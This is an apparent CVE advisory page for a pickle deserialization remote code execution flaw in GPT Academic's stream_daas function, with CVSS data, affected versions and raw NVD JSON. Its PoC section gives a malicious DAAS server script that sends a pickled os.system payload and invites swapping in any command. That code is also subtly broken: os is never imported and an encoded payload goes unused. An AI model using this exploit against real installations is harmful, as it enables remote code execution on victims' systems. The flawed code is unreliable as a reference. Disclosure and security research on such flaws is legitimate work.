Security Vulnerability Report
中文
CVE-2026-0762 CVSS 8.1 HIGH

CVE-2026-0762

Published: 2026-01-23 04:16:03
Last Modified: 2026-02-18 16:41:57
Source: [email protected]

Description

GPT Academic stream_daas Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GPT Academic. Interaction with a malicious DAAS server is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the stream_daas function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27956.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:binary-husky:gpt_academic:3.91:*:*:*:*:*:*:* - VULNERABLE
GPT Academic 所有版本(stream_daas功能受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
''' CVE-2026-0762 PoC - Malicious DAAS Server for GPT Academic RCE Note: This is for educational and security research purposes only. Author: Security Researcher Reference: ZDI-CAN-27956 ''' import pickle import base64 import http.server import socketserver from urllib.parse import urlparse, parse_qs # Malicious payload that executes arbitrary command class RCEPayload: def __reduce__(self): # Replace 'whoami' with any command you want to execute cmd = "whoami" return (os.system, (cmd,)) class MaliciousDAASHandler(http.server.BaseHTTPRequestHandler): def do_GET(self): parsed_path = urlparse(self.path) if '/stream' in parsed_path.path or '/daas' in parsed_path.path: # Generate malicious serialized payload payload = pickle.dumps(RCEPayload()) encoded_payload = base64.b64encode(payload).decode('utf-8') # Send malicious response self.send_response(200) self.send_header('Content-type', 'application/octet-stream') self.end_headers() self.wfile.write(payload) print(f"[+] Sent malicious payload to {self.client_address}") else: self.send_response(404) self.end_headers() def log_message(self, format, *args): print(f"[*] {self.address_string()} - {format % args}") def main(): PORT = 8080 print(f"[*] Starting malicious DAAS server on port {PORT}") print(f"[*] Waiting for GPT Academic to connect...") with socketserver.TCPServer(("", PORT), MaliciousDAASHandler) as httpd: httpd.serve_forever() if __name__ == "__main__": main() # Client-side trigger (to be used when GPT Academic connects to malicious server) # The vulnerable code in stream_daas function will deserialize this payload: # import pickle # data = response_from_malicious_server # obj = pickle.loads(data) # This triggers RCE print("\n[!] Disclaimer: This PoC is for authorized security testing only.") print("[!] Unauthorized access to computer systems is illegal.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0762", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:02.973", "lastModified": "2026-02-18T16:41:56.887", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GPT Academic stream_daas Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GPT Academic. Interaction with a malicious DAAS server is required to exploit this vulnerability but attack vectors may vary depending on the implementation.\n\nThe specific flaw exists within the stream_daas function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27956."}, {"lang": "es", "value": "Vulnerabilidad de ejecución remota de código por deserialización de datos no confiables en GPT Academic stream_daas. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de GPT Academic. Se requiere interacción con un servidor DAAS malicioso para explotar esta vulnerabilidad, pero los vectores de ataque pueden variar dependiendo de la implementación.\n\nLa falla específica existe dentro de la función stream_daas. El problema se debe a la falta de validación adecuada de los datos proporcionados por el usuario, lo que puede resultar en la deserialización de datos no confiables. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto de root. Fue ZDI-CAN-27956."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:binary-husky:gpt_academic:3.91:*:*:*:*:*:*:*", "matchCriteriaId": "E6552037-FD85-48BB-A474-C85A10783308"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-028/", "source": "[email protected]", "tags": ["Mitigation", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.